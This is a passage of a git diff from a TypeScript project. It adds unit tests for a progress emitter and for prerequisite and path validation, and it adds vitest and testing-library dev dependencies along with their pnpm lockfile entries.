expect(events[1].total).toBe(10); + expect(events[1].percentage).toBe(10); + }); + + it('should calculate percentage correctly', () => { + const emitter = new ProgressEmitter(4); + const percentages: number[] = []; + + emitter.on('progress', (event: ProgressEvent) => { + percentages.push(event.percentage); + }); + + emitter.tick('1'); + emitter.tick('2'); + emitter.tick('3'); + emitter.tick('4'); + + expect(percentages).toEqual([25, 50, 75, 100]); + }); + + it('should round percentage to nearest 
integer', () => { + const emitter = new ProgressEmitter(3); + const percentages: number[] = []; + + emitter.on('progress', (event: ProgressEvent) => { + percentages.push(event.percentage); + }); + + emitter.tick('1'); // 1/3 = 33.33... -> 33 + emitter.tick('2'); // 2/3 = 66.66... -> 67 + emitter.tick('3'); // 3/3 = 100 + + expect(percentages).toEqual([33, 67, 100]); + }); +}); + +describe('createProgressEmitter', () => { + it('should create a ProgressEmitter instance', () => { + const emitter = createProgressEmitter(5); + expect(emitter).toBeInstanceOf(ProgressEmitter); + }); + + it('should create a functional emitter', () => { + const emitter = createProgressEmitter(2); + const events: ProgressEvent[] = []; + + emitter.on('progress', (event: ProgressEvent) => { + events.push(event); + }); + + emitter.tick('item'); + expect(events).toHaveLength(1); + expect(events[0].total).toBe(2); + }); +}); diff --git a/tests/unit/utils/validation.edge-cases.test.ts b/tests/unit/utils/validation.edge-cases.test.ts index 3f5af6f..85c6ab4 100644 --- a/tests/unit/utils/validation.edge-cases.test.ts +++ b/tests/unit/utils/validation.edge-cases.test.ts @@ -164,9 +164,10 @@ describe('Validation Edge Cases', () => { describe('absolute vs relative paths', () => { it('should handle absolute path', () => { - const result = parseRepoSource('/Users/test/projects/repo'); + const absoluteInput = '/Users/test/projects/repo'; + const result = parseRepoSource(absoluteInput); expect(result.type).toBe('local'); - expect(result.resolved).toBe('/Users/test/projects/repo'); + expect(result.resolved).toBe(path.resolve(absoluteInput)); }); it('should resolve relative path starting with ./', () => { @@ -406,4 +407,40 @@ describe('Validation Edge Cases', () => { expect(sanitizePackageName('a!!!b')).toBe('a---b'); }); }); + + describe('checkPrerequisites edge cases', () => { + it('should check yarn-berry as yarn command', async () => { + const { checkPrerequisites } = await 
import('../../../src/utils/validation.js'); + const result = await checkPrerequisites({ + outputDir: '/tmp', + packageManager: 'yarn-berry', + }); + expect(result).toBeDefined(); + // yarn-berry maps to checking 'yarn' command + expect(typeof result.valid).toBe('boolean'); + }); + + it('should check npm as package manager', async () => { + const { checkPrerequisites } = await import('../../../src/utils/validation.js'); + const result = await checkPrerequisites({ + outputDir: '/tmp', + packageManager: 'npm', + }); + expect(result).toBeDefined(); + // npm should be installed since Node.js is installed + const npmErrors = result.errors.filter((e) => e.includes('npm')); + expect(npmErrors).toHaveLength(0); + }); + + it('should check non-existent output dir parent writability', async () => { + const { checkPrerequisites } = await import('../../../src/utils/validation.js'); + const result = await checkPrerequisites({ + outputDir: '/tmp/nonexistent-monotize-test/deep/path', + }); + expect(result).toBeDefined(); + // Parent doesn't exist, should error about writability + const writeErrors = result.errors.filter((e) => e.includes('writable')); + expect(writeErrors.length).toBeGreaterThanOrEqual(1); + }); + }); }); diff --git a/tests/utils/validation.test.ts b/tests/utils/validation.test.ts index 5113cae..650ba18 100644 --- a/tests/utils/validation.test.ts +++ b/tests/utils/validation.test.ts @@ -1,3 +1,4 @@ +import path from 'node:path'; import { describe, it, expect } from 'vitest'; import { parseRepoSource, validateRepoSources, isValidPackageName, sanitizePackageName } from '../../src/utils/validation.js'; @@ -38,10 +39,11 @@ describe('parseRepoSource', () => { }); it('should parse absolute local paths', () => { - const result = parseRepoSource('/Users/test/my-repo'); + const absoluteInput = '/Users/test/my-repo'; + const result = parseRepoSource(absoluteInput); expect(result.type).toBe('local'); expect(result.name).toBe('my-repo'); - 
expect(result.resolved).toBe('/Users/test/my-repo'); + expect(result.resolved).toBe(path.resolve(absoluteInput)); }); it('should handle repos with .git suffix', () => { diff --git a/ui/package.json b/ui/package.json index 0dce6eb..e9e4e3e 100755 --- a/ui/package.json +++ b/ui/package.json @@ -6,17 +6,23 @@ "scripts": { "dev": "vite --port 5173", "build": "vite build", - "preview": "vite preview" + "preview": "vite preview", + "test": "vitest run", + "test:watch": "vitest" }, "dependencies": { "react": "^19.0.0", "react-dom": "^19.0.0" }, "devDependencies": { + "@testing-library/jest-dom": "^6.9.1", + "@testing-library/react": "^16.3.2", "@types/react": "^19.0.0", "@types/react-dom": "^19.0.0", "@vitejs/plugin-react": "^4.0.0", + "jsdom": "^28.1.0", "typescript": "^5.3.0", - "vite": "^6.0.0" + "vite": "^6.0.0", + "vitest": "^4.0.18" } } diff --git a/ui/pnpm-lock.yaml b/ui/pnpm-lock.yaml index c9e4791..25fb503 100755 --- a/ui/pnpm-lock.yaml +++ b/ui/pnpm-lock.yaml @@ -15,6 +15,12 @@ importers: specifier: ^19.0.0 version: 19.2.4(react@19.2.4) devDependencies: + '@testing-library/jest-dom': + specifier: ^6.9.1 + version: 6.9.1 + '@testing-library/react': + specifier: ^16.3.2 + version: 16.3.2(@testing-library/dom@10.4.1)(@types/react-dom@19.2.3(@types/react@19.2.14))(@types/react@19.2.14)(react-dom@19.2.4(react@19.2.4))(react@19.2.4) '@types/react': specifier: ^19.0.0 version: 19.2.14 @@ -24,15 +30,37 @@ importers: '@vitejs/plugin-react': specifier: ^4.0.0 version: 4.7.0(vite@6.4.1) + jsdom: + specifier: ^28.1.0 + version: 28.1.0 typescript: specifier: ^5.3.0 version: 5.9.3 vite: specifier: ^6.0.0 version: 6.4.1 + vitest: + specifier: ^4.0.18 + version: 4.0.18(jsdom@28.1.0) packages: + '@acemir/cssom@0.9.31': + resolution: {integrity: sha512-ZnR3GSaH+/vJ0YlHau21FjfLYjMpYVIzTD8M8vIEQvIGxeOXyXdzCI140rrCY862p/C/BbzWsjc1dgnM9mkoTA==} + + '@adobe/css-tools@4.4.4': + resolution: {integrity: 
sha512-Elp+iwUx5rN5+Y8xLt5/GRoG20WGoDCQ/1Fb+1LiGtvwbDavuSk0jhD/eZdckHAuzcDzccnkv+rEjyWfRx18gg==} + + '@asamuzakjp/css-color@5.0.1': + resolution: {integrity: sha512-2SZFvqMyvboVV1d15lMf7XiI3m7SDqXUuKaTymJYLN6dSGadqp+fVojqJlVoMlbZnlTmu3S0TLwLTJpvBMO1Aw==} + engines: {node: ^20.19.0 || ^22.12.0 || >=24.0.0} + + '@asamuzakjp/dom-selector@6.8.1': + resolution: {integrity: sha512-MvRz1nCqW0fsy8Qz4dnLIvhOlMzqDVBabZx6lH+YywFDdjXhMY37SmpV1XFX3JzG5GWHn63j6HX6QPr3lZXHvQ==} + + '@asamuzakjp/nwsapi@2.3.9': + resolution: {integrity: sha512-n8GuYSrI9bF7FFZ/SjhwevlHc8xaVlb/7HmHelnc/PZXBD2ZR49NnN9sMMuDdEGPeeRQ5d0hqlSlEpgCX3Wl0Q==} + '@babel/code-frame@7.29.0': resolution: {integrity: sha512-9NhCeYjq9+3uxgdtp20LSiJXJvN0FeCtNGpJxuMFZ1Kv3cWUNb6DOhJwUvcVCzKGR66cw4njwM6hrJLqgOwbcw==} engines: {node: '>=6.9.0'} @@ -104,6 +132,10 @@ packages: peerDependencies: '@babel/core': ^7.0.0-0 + '@babel/runtime@7.28.6': + resolution: {integrity: sha512-05WQkdpL9COIMz4LjTxGpPNCdlpyimKppYNoJ5Di5EUObifl8t4tuLuUBBZEpoLYOmfvIWrsp9fCl0HoPRVTdA==} + engines: {node: '>=6.9.0'} + '@babel/template@7.28.6': resolution: {integrity: sha512-YA6Ma2KsCdGb+WC6UpBVFJGXL58MDA6oyONbjyF/+5sBgxY/dwkhLogbMT2GXXyU84/IhRw/2D1Os1B/giz+BQ==} engines: {node: '>=6.9.0'} @@ -116,6 +148,41 @@ packages: resolution: {integrity: sha512-LwdZHpScM4Qz8Xw2iKSzS+cfglZzJGvofQICy7W7v4caru4EaAmyUuO6BGrbyQ2mYV11W0U8j5mBhd14dd3B0A==} engines: {node: '>=6.9.0'} + '@bramus/specificity@2.4.2': + resolution: {integrity: sha512-ctxtJ/eA+t+6q2++vj5j7FYX3nRu311q1wfYH3xjlLOsczhlhxAg2FWNUXhpGvAw3BWo1xBcvOV6/YLc2r5FJw==} + hasBin: true + + '@csstools/color-helpers@6.0.2': + resolution: {integrity: sha512-LMGQLS9EuADloEFkcTBR3BwV/CGHV7zyDxVRtVDTwdI2Ca4it0CCVTT9wCkxSgokjE5Ho41hEPgb8OEUwoXr6Q==} + engines: {node: '>=20.19.0'} + + '@csstools/css-calc@3.1.1': + resolution: {integrity: sha512-HJ26Z/vmsZQqs/o3a6bgKslXGFAungXGbinULZO3eMsOyNJHeBBZfup5FiZInOghgoM4Hwnmw+OgbJCNg1wwUQ==} + engines: {node: '>=20.19.0'} + peerDependencies: + 
'@csstools/css-parser-algorithms': ^4.0.0 + '@csstools/css-tokenizer': ^4.0.0 + + '@csstools/css-color-parser@4.0.2': + resolution: {integrity: sha512-0GEfbBLmTFf0dJlpsNU7zwxRIH0/BGEMuXLTCvFYxuL1tNhqzTbtnFICyJLTNK4a+RechKP75e7w42ClXSnJQw==} + engines: {node: '>=20.19.0'} + peerDependencies: + '@csstools/css-parser-algorithms': ^4.0.0 + '@csstools/css-tokenizer': ^4.0.0 + + '@csstools/css-parser-algorithms@4.0.0': + resolution: {integrity: sha512-+B87qS7fIG3L5h3qwJ/IFbjoVoOe/bpOdh9hAjXbvx0o8ImEmUsGXN0inFOnk2ChCFgqkkGFQ+TpM5rbhkKe4w==} + engines: {node: '>=20.19.0'} + peerDependencies: + '@csstools/css-tokenizer': ^4.0.0 + + '@csstools/css-syntax-patches-for-csstree@1.0.29': + resolution: {integrity: sha512-jx9GjkkP5YHuTmko2eWAvpPnb0mB4mGRr2U7XwVNwevm8nlpobZEVk+GNmiYMk2VuA75v+plfXWyroWKmICZXg==} + + '@csstools/css-tokenizer@4.0.0': + resolution: {integrity: sha512-QxULHAm7cNu72w97JUNCBFODFaXpbDg+dP8b/oWFAZ2MTRppA3U00Y2L1HqaS4J6yBqxwa/Y3nMBaxVKbB/NsA==} + engines: {node: '>=20.19.0'} + '@esbuild/aix-ppc64@0.25.12': resolution: {integrity: sha512-Hhmwd6CInZ3dwpuGTF8fJG6yoWmsToE+vYgD4nytZVxcu1ulHpUQRAB1UJ8+N1Am3Mz4+xOByoQoSZf4D+CpkA==} engines: {node: '>=18'} @@ -272,6 +339,15 @@ packages: cpu: [x64] os: [win32] + '@exodus/bytes@1.14.1': + resolution: {integrity: sha512-OhkBFWI6GcRMUroChZiopRiSp2iAMvEBK47NhJooDqz1RERO4QuZIZnjP63TXX8GAiLABkYmX+fuQsdJ1dd2QQ==} + engines: {node: ^20.19.0 || ^22.12.0 || >=24.0.0} + peerDependencies: + '@noble/hashes': ^1.8.0 || ^2.0.0 + peerDependenciesMeta: + '@noble/hashes': + optional: true + '@jridgewell/gen-mapping@0.3.13': resolution: {integrity: sha512-2kkt/7niJ6MgEPxF0bYdQ6etZaA+fQvDcLKckhy1yIQOzaoKjBBjSj63/aLVjYE3qhRt5dvM+uUyfCg6UKCBbA==} @@ -429,6 +505,35 @@ packages: cpu: [x64] os: [win32] + '@standard-schema/spec@1.1.0': + resolution: {integrity: sha512-l2aFy5jALhniG5HgqrD6jXLi/rUWrKvqN/qJx6yoJsgKhblVd+iqqU4RCXavm/jPityDo5TCvKMnpjKnOriy0w==} + + '@testing-library/dom@10.4.1': + resolution: {integrity: 
sha512-o4PXJQidqJl82ckFaXUeoAW+XysPLauYI43Abki5hABd853iMhitooc6znOnczgbTYmEP6U6/y1ZyKAIsvMKGg==} + engines: {node: '>=18'} + + '@testing-library/jest-dom@6.9.1': + resolution: {integrity: sha512-zIcONa+hVtVSSep9UT3jZ5rizo2BsxgyDYU7WFD5eICBE7no3881HGeb/QkGfsJs6JTkY1aQhT7rIPC7e+0nnA==} + engines: {node: '>=14', npm: '>=6', yarn: '>=1'} + + '@testing-library/react@16.3.2': + resolution: {integrity: sha512-XU5/SytQM+ykqMnAnvB2umaJNIOsLF3PVv//1Ew4CTcpz0/BRyy/af40qqrt7SjKpDdT1saBMc42CUok5gaw+g==} + engines: {node: '>=18'} + peerDependencies: + '@testing-library/dom': ^10.0.0 + '@types/react': ^18.0.0 || ^19.0.0 + '@types/react-dom': ^18.0.0 || ^19.0.0 + react: ^18.0.0 || ^19.0.0 + react-dom: ^18.0.0 || ^19.0.0 + peerDependenciesMeta: + '@types/react': + optional: true + '@types/react-dom': + optional: true + + '@types/aria-query@5.0.4': + resolution: {integrity: sha512-rfT93uj5s0PRL7EzccGMs3brplhcrghnDoV26NqKhCAS1hVo+WdNsPvE/yb6ilfr5hi2MEk6d5EWJTKdxg8jVw==} + '@types/babel__core@7.20.5': resolution: {integrity: sha512-qoQprZvz5wQFJwMDqeseRXWv3rqMvhgpbXFfVyWhbx9X47POIA6i/+dXefEmZKoAgOaTdaIgNSMqMIU61yRyzA==} @@ -441,6 +546,12 @@ packages: '@types/babel__traverse@7.28.0': resolution: {integrity: sha512-8PvcXf70gTDZBgt9ptxJ8elBeBjcLOAcOtoO/mPJjtji1+CdGbHgm77om1GrsPxsiE+uXIpNSK64UYaIwQXd4Q==} + '@types/chai@5.2.3': + resolution: {integrity: sha512-Mw558oeA9fFbv65/y4mHtXDs9bPnFMZAL/jxdPFUpOHHIXX91mcgEHbS5Lahr+pwZFR8A7GQleRWeI6cGFC2UA==} + + '@types/deep-eql@4.0.2': + resolution: {integrity: sha512-c9h9dVVMigMPc4bwTvC5dxqtqJZwQPePsWjPlpSOnojbor6pGqdk541lfA7AqFQr5pB1BRdq0juY9db81BwyFw==} + '@types/estree@1.0.8': resolution: {integrity: sha512-dWHzHa2WqEXI/O1E9OjrocMTKJl2mSrEolh1Iomrv6U+JuNwaHXsXx9bLu5gG7BUWFIN0skIQJQ/L1rIex4X6w==} @@ -458,11 +569,66 @@ packages: peerDependencies: vite: ^4.2.0 || ^5.0.0 || ^6.0.0 || ^7.0.0 + '@vitest/expect@4.0.18': + resolution: {integrity: sha512-8sCWUyckXXYvx4opfzVY03EOiYVxyNrHS5QxX3DAIi5dpJAAkyJezHCP77VMX4HKA2LDT/Jpfo8i2r5BE3GnQQ==} + + 
'@vitest/mocker@4.0.18': + resolution: {integrity: sha512-HhVd0MDnzzsgevnOWCBj5Otnzobjy5wLBe4EdeeFGv8luMsGcYqDuFRMcttKWZA5vVO8RFjexVovXvAM4JoJDQ==} + peerDependencies: + msw: ^2.4.9 + vite: ^6.0.0 || ^7.0.0-0 + peerDependenciesMeta: + msw: + optional: true + vite: + optional: true + + '@vitest/pretty-format@4.0.18': + resolution: {integrity: sha512-P24GK3GulZWC5tz87ux0m8OADrQIUVDPIjjj65vBXYG17ZeU3qD7r+MNZ1RNv4l8CGU2vtTRqixrOi9fYk/yKw==} + + '@vitest/runner@4.0.18': + resolution: {integrity: sha512-rpk9y12PGa22Jg6g5M3UVVnTS7+zycIGk9ZNGN+m6tZHKQb7jrP7/77WfZy13Y/EUDd52NDsLRQhYKtv7XfPQw==} + + '@vitest/snapshot@4.0.18': + resolution: {integrity: sha512-PCiV0rcl7jKQjbgYqjtakly6T1uwv/5BQ9SwBLekVg/EaYeQFPiXcgrC2Y7vDMA8dM1SUEAEV82kgSQIlXNMvA==} + + '@vitest/spy@4.0.18': + resolution: {integrity: sha512-cbQt3PTSD7P2OARdVW3qWER5EGq7PHlvE+QfzSC0lbwO+xnt7+XH06ZzFjFRgzUX//JmpxrCu92VdwvEPlWSNw==} + + '@vitest/utils@4.0.18': + resolution: {integrity: sha512-msMRKLMVLWygpK3u2Hybgi4MNjcYJvwTb0Ru09+fOyCXIgT5raYP041DRRdiJiI3k/2U6SEbAETB3YtBrUkCFA==} + + agent-base@7.1.4: + resolution: {integrity: sha512-MnA+YT8fwfJPgBx3m60MNqakm30XOkyIoH1y6huTQvC0PwZG7ki8NacLBcrPbNoo8vEZy7Jpuk7+jMO+CUovTQ==} + engines: {node: '>= 14'} + + ansi-regex@5.0.1: + resolution: {integrity: sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ==} + engines: {node: '>=8'} + + ansi-styles@5.2.0: + resolution: {integrity: sha512-Cxwpt2SfTzTtXcfOlzGEee8O+c+MmUgGrNiBcXnuWxuFJHe6a5Hz7qwhwe5OgaSYI0IJvkLqWX1ASG+cJOkEiA==} + engines: {node: '>=10'} + + aria-query@5.3.0: + resolution: {integrity: sha512-b0P0sZPKtyu8HkeRAfCq0IfURZK+SuwMjY1UXGBU27wpAiTwQAIlq56IbIO+ytk/JjS1fMR14ee5WBBfKi5J6A==} + + aria-query@5.3.2: + resolution: {integrity: sha512-COROpnaoap1E2F000S62r6A60uHZnmlvomhfyT2DlTcrY1OrBKn2UhH7qn5wTC9zMvD0AY7csdPSNwKP+7WiQw==} + engines: {node: '>= 0.4'} + + assertion-error@2.0.1: + resolution: {integrity: 
sha512-Izi8RQcffqCeNVgFigKli1ssklIbpHnCYc6AknXGYoB6grJqyeby7jv12JUQgmTAnIDnbck1uxksT4dzN3PWBA==} + engines: {node: '>=12'} + baseline-browser-mapping@2.10.0: resolution: {integrity: sha512-lIyg0szRfYbiy67j9KN8IyeD7q7hcmqnJ1ddWmNt19ItGpNN64mnllmxUNFIOdOm6by97jlL6wfpTTJrmnjWAA==} engines: {node: '>=6.0.0'} hasBin: true + bidi-js@1.0.3: + resolution: {integrity: sha512-RKshQI1R3YQ+n9YJz2QQ147P66ELpa1FQEg20Dk8oW9t2KgLbpDLLp9aGZ7y8WHSshDknG0bknqGw5/tyCs5tw==} + browserslist@4.28.1: resolution: {integrity: sha512-ZC5Bd0LgJXgwGqUknZY/vkUQ04r8NXnJZ3yYi4vDmSiZmC/pdSN0NbNRPxZpbtO4uAfDUAFffO8IZoM3Gj8IkA==} engines: {node: ^6 || ^7 || ^8 || ^9 || ^10 || ^11 || ^12 || >=13.7} @@ -471,12 +637,31 @@ packages: caniuse-lite@1.0.30001774: resolution: {integrity: sha512-DDdwPGz99nmIEv216hKSgLD+D4ikHQHjBC/seF98N9CPqRX4M5mSxT9eTV6oyisnJcuzxtZy4n17yKKQYmYQOA==} + chai@6.2.2: + resolution: {integrity: sha512-NUPRluOfOiTKBKvWPtSD4PhFvWCqOi0BGStNWs57X9js7XGTprSmFoz5F0tWhR4WPjNeR9jXqdC7/UpSJTnlRg==} + engines: {node: '>=18'} + convert-source-map@2.0.0: resolution: {integrity: sha512-Kvp459HrV2FEJ1CAsi1Ku+MY3kasH19TFykTz2xWmMeq6bk2NU3XXvfJ+Q61m0xktWwt+1HSYf3JZsTms3aRJg==} + css-tree@3.1.0: + resolution: {integrity: sha512-0eW44TGN5SQXU1mWSkKwFstI/22X2bG1nYzZTYMAWjylYURhse752YgbE4Cx46AC+bAvI+/dYTPRk1LqSUnu6w==} + engines: {node: ^10 || ^12.20.0 || ^14.13.0 || >=15.0.0} + + css.escape@1.5.1: + resolution: {integrity: sha512-YUifsXXuknHlUsmlgyY0PKzgPOr7/FjCePfHNt0jxm83wHZi44VDMQ7/fGNkjY3/jV1MC+1CmZbaHzugyeRtpg==} + + cssstyle@6.2.0: + resolution: {integrity: sha512-Fm5NvhYathRnXNVndkUsCCuR63DCLVVwGOOwQw782coXFi5HhkXdu289l59HlXZBawsyNccXfWRYvLzcDCdDig==} + engines: {node: '>=20'} + csstype@3.2.3: resolution: {integrity: sha512-z1HGKcYy2xA8AGQfwrn0PAy+PB7X/GSj3UVJW9qKyn43xWa+gl5nXmU4qqLMRzWVLFC8KusUX8T/0kCiOYpAIQ==} + data-urls@7.0.0: + resolution: {integrity: sha512-23XHcCF+coGYevirZceTVD7NdJOqVn+49IHyxgszm+JIiHLoB2TkmPtsYkNWT1pvRSGkc35L6NHs0yHkN2SumA==} + engines: {node: ^20.19.0 || ^22.12.0 || 
>=24.0.0} + debug@4.4.3: resolution: {integrity: sha512-RGwwWnwQvkVfavKVt22FGLw+xYSdzARwm0ru6DhTVA3umU5hZc28V3kO4stgYryrTlLpuvgI9GiijltAjNbcqA==} engines: {node: '>=6.0'} @@ -486,9 +671,29 @@ packages: supports-color: optional: true + decimal.js@10.6.0: + resolution: {integrity: sha512-YpgQiITW3JXGntzdUmyUR1V812Hn8T1YVXhCu+wO3OpS4eU9l4YdD3qjyiKdV6mvV29zapkMeD390UVEf2lkUg==} + + dequal@2.0.3: + resolution: {integrity: sha512-0je+qPKHEMohvfRTCEo3CrPG6cAzAYgmzKyxRiYSSDkS6eGJdyVJm7WaYA5ECaAD9wLB2T4EEeymA5aFVcYXCA==} + engines: {node: '>=6'} + + dom-accessibility-api@0.5.16: + resolution: {integrity: sha512-X7BJ2yElsnOJ30pZF4uIIDfBEVgF4XEBxL9Bxhy6dnrm5hkzqmsWHGTiHqRiITNhMyFLyAiWndIJP7Z1NTteDg==} + + dom-accessibility-api@0.6.3: + resolution: {integrity: sha512-7ZgogeTnjuHbo+ct10G9Ffp0mif17idi0IyWNVA/wcwcm7NPOD/WEHVP3n7n3MhXqxoIYm8d6MuZohYWIZ4T3w==} + electron-to-chromium@1.5.302: resolution: {integrity: sha512-sM6HAN2LyK82IyPBpznDRqlTQAtuSaO+ShzFiWTvoMJLHyZ+Y39r8VMfHzwbU8MVBzQ4Wdn85+wlZl2TLGIlwg==} + entities@6.0.1: + resolution: {integrity: sha512-aN97NXWF6AWBTahfVOIrB/NShkzi5H7F9r1s9mD3cDj4Ko5f2qhhVoYMibXF7GlLveb/D2ioWay8lxI97Ven3g==} + engines: {node: '>=0.12'} + + es-module-lexer@1.7.0: + resolution: {integrity: sha512-jEQoCwk8hyb2AZziIOLhDqpm5+2ww5uIE6lkO/6jcOCusfk6LhMHpXXfBLXTZ7Ydyt0j4VoUQv6uGNYbdW+kBA==} + esbuild@0.25.12: resolution: {integrity: sha512-bbPBYYrtZbkt6Os6FiTLCTFxvq4tt3JKall1vRwshA3fdVztsLAatFaZobhkBC8/BrPetoa0oksYoKXoG4ryJg==} engines: {node: '>=18'} @@ -498,6 +703,13 @@ packages: resolution: {integrity: sha512-WUj2qlxaQtO4g6Pq5c29GTcWGDyd8itL8zTlipgECz3JesAiiOKotd8JU6otB3PACgG6xkJUyVhboMS+bje/jA==} engines: {node: '>=6'} + estree-walker@3.0.3: + resolution: {integrity: sha512-7RUKfXgSMMkzt6ZuXmqapOurLGPPfgj6l9uRZ7lRGolvk0y2yocc35LdcxKC5PQZdn2DMqioAQ2NoWcrTKmm6g==} + + expect-type@1.3.0: + resolution: {integrity: sha512-knvyeauYhqjOYvQ66MznSMs83wmHrCycNEN6Ao+2AeYEfxUIkuiVxdEa1qlGEPK+We3n0THiDciYSsCcgW/DoA==} + engines: {node: '>=12.0.0'} + 
fdir@6.5.0: resolution: {integrity: sha512-tIbYtZbucOs0BRGqPJkshJUYdL+SDH7dVM8gjy+ERp3WAUjLEFJE+02kanyHtwjWOnwrKYBiwAmM0p4kLJAnXg==} engines: {node: '>=12.0.0'} @@ -516,9 +728,37 @@ packages: resolution: {integrity: sha512-3hN7NaskYvMDLQY55gnW3NQ+mesEAepTqlg+VEbj7zzqEMBVNhzcGYYeqFo/TlYz6eQiFcp1HcsCZO+nGgS8zg==} engines: {node: '>=6.9.0'} + html-encoding-sniffer@6.0.0: + resolution: {integrity: sha512-CV9TW3Y3f8/wT0BRFc1/KAVQ3TUHiXmaAb6VW9vtiMFf7SLoMd1PdAc4W3KFOFETBJUb90KatHqlsZMWV+R9Gg==} + engines: {node: ^20.19.0 || ^22.12.0 || >=24.0.0} + + http-proxy-agent@7.0.2: + resolution: {integrity: sha512-T1gkAiYYDWYx3V5Bmyu7HcfcvL7mUrTWiM6yOfa3PIphViJ/gFPbvidQ+veqSOHci/PxBcDabeUNCzpOODJZig==} + engines: {node: '>= 14'} + + https-proxy-agent@7.0.6: + resolution: {integrity: sha512-vK9P5/iUfdl95AI+JVyUuIcVtd4ofvtrOr3HNtM2yxC9bnMbEdp3x01OhQNnjb8IJYi38VlTE3mBXwcfvywuSw==} + engines: {node: '>= 14'} + + indent-string@4.0.0: + resolution: {integrity: sha512-EdDDZu4A2OyIK7Lr/2zG+w5jmbuk1DVBnEwREQvBzspBJkCEbRa8GxU1lghYcaGJCnRWibjDXlq779X1/y5xwg==} + engines: {node: '>=8'} + + is-potential-custom-element-name@1.0.1: + resolution: {integrity: sha512-bCYeRA2rVibKZd+s2625gGnGF/t7DSqDs4dP7CrLA1m7jKWz6pps0LpYLJN8Q64HtmPKJ1hrN3nzPNKFEKOUiQ==} + js-tokens@4.0.0: resolution: {integrity: sha512-RdJUflcE3cUzKiMqQgsCu06FPu9UdIJO0beYbPhHN4k6apgJtifcoCtT9bcxOpYBtpD2kCM6Sbzg4CausW/PKQ==} + jsdom@28.1.0: + resolution: {integrity: sha512-0+MoQNYyr2rBHqO1xilltfDjV9G7ymYGlAUazgcDLQaUf8JDHbuGwsxN6U9qWaElZ4w1B2r7yEGIL3GdeW3Rug==} + engines: {node: ^20.19.0 || ^22.12.0 || >=24.0.0} + peerDependencies: + canvas: ^3.0.0 + peerDependenciesMeta: + canvas: + optional: true + jsesc@3.1.0: resolution: {integrity: sha512-/sM3dO2FOzXjKQhJuo0Q173wf2KOo8t4I8vHy6lF9poUp7bKT0/NHE8fPX23PwfhnykfqnC2xRxOnVw5XuGIaA==} engines: {node: '>=6'} @@ -529,9 +769,27 @@ packages: engines: {node: '>=6'} hasBin: true + lru-cache@11.2.6: + resolution: {integrity: 
sha512-ESL2CrkS/2wTPfuend7Zhkzo2u0daGJ/A2VucJOgQ/C48S/zB8MMeMHSGKYpXhIjbPxfuezITkaBH1wqv00DDQ==} + engines: {node: 20 || >=22} + lru-cache@5.1.1: resolution: {integrity: sha512-KpNARQA3Iwv+jTA0utUVVbrh+Jlrr1Fv0e56GGzAFOXN7dk/FviaDW8LHmK52DlcH4WP2n6gI8vN1aesBFgo9w==} + lz-string@1.5.0: + resolution: {integrity: sha512-h5bgJWpxJNswbU7qCrV0tIKQCaS3blPDrqKWx+QxzuzL1zGUzij9XCWLrSLsJPu5t+eWA/ycetzYAO5IOMcWAQ==} + hasBin: true + + magic-string@0.30.21: + resolution: {integrity: sha512-vd2F4YUyEXKGcLHoq+TEyCjxueSeHnFxyyjNp80yg0XV4vUhnDer/lvvlqM/arB5bXQN5K2/3oinyCRyx8T2CQ==} + + mdn-data@2.12.2: + resolution: {integrity: sha512-IEn+pegP1aManZuckezWCO+XZQDplx1366JoVhTpMpBB1sPey/SbveZQUosKiKiGYjg1wH4pMlNgXbCiYgihQA==} + + min-indent@1.0.1: + resolution: {integrity: sha512-I9jwMn07Sy/IwOj3zVkVik2JTvgpaykDZEigL6Rx6N9LbMywwUSMtxET+7lVoDLLd3O3IXwJwvuuns8UB/HeAg==} + engines: {node: '>=4'} + ms@2.1.3: resolution: {integrity: sha512-6FlzubTLZG3J2a/NVCAleEhjzq5oxgHyaCU9yYXvcLsvoVaHJq/s5xXI6/XXP6tz7R9xAOtHnSO/tXtF3WRTlA==} @@ -543,6 +801,15 @@ packages: node-releases@2.0.27: resolution: {integrity: sha512-nmh3lCkYZ3grZvqcCH+fjmQ7X+H0OeZgP40OierEaAptX4XofMh5kwNbWh7lBduUzCcV/8kZ+NDLCwm2iorIlA==} + obug@2.1.1: + resolution: {integrity: sha512-uTqF9MuPraAQ+IsnPf366RG4cP9RtUi7MLO1N3KEc+wb0a6yKpeL0lmk2IB1jY5KHPAlTc6T/JRdC/YqxHNwkQ==} + + parse5@8.0.0: + resolution: {integrity: sha512-9m4m5GSgXjL4AjumKzq1Fgfp3Z8rsvjRNbnkVwfu2ImRqE5D0LnY2QfDen18FSY9C573YU5XxSapdHZTZ2WolA==} + + pathe@2.0.3: + resolution: {integrity: sha512-WUjGcAqP1gQacoQe+OBJsFA7Ld4DyXuUIjZ5cc75cLHvJ7dtNsTugphxIADwspS+AraAUePCKrSVtPLFj/F88w==} + picocolors@1.1.1: resolution: {integrity: sha512-xceH2snhtb5M9liqDsmEw56le376mTZkEX/jEb/RxNFyegNul7eNslCXP9FDj/Lcu0X8KEyMceP2ntpaHrDEVA==} @@ -554,11 +821,22 @@ packages: resolution: {integrity: sha512-3Ybi1tAuwAP9s0r1UQ2J4n5Y0G05bJkpUIO0/bI9MhwmD70S5aTWbXGBwxHrelT+XM1k6dM0pk+SwNkpTRN7Pg==} engines: {node: ^10 || ^12 || >=14} + pretty-format@27.5.1: + resolution: {integrity: 
sha512-Qb1gy5OrP5+zDf2Bvnzdl3jsTf1qXVMazbvCoKhtKqVs4/YK4ozX4gKQJJVyNe+cajNPn0KoC0MC3FUmaHWEmQ==} + engines: {node: ^10.13.0 || ^12.13.0 || ^14.15.0 || >=15.0.0} + + punycode@2.3.1: + resolution: {integrity: sha512-vYt7UD1U9Wg6138shLtLOvdAu+8DsC/ilFtEVHcH+wydcSpNE20AfSOduf6MkRFahL5FY7X1oU7nKVZFtfq8Fg==} + engines: {node: '>=6'} + react-dom@19.2.4: resolution: {integrity: sha512-AXJdLo8kgMbimY95O2aKQqsz2iWi9jMgKJhRBAxECE4IFxfcazB2LmzloIoibJI3C12IlY20+KFaLv+71bUJeQ==} peerDependencies: react: ^19.2.4 + react-is@17.0.2: + resolution: {integrity: sha512-w2GsyukL62IJnlaff/nRegPQR94C/XXamvMWmSHRJ4y7Ts/4ocGRmTHvOs8PSE6pB3dWOrD/nueuU5sduBsQ4w==} + react-refresh@0.17.0: resolution: {integrity: 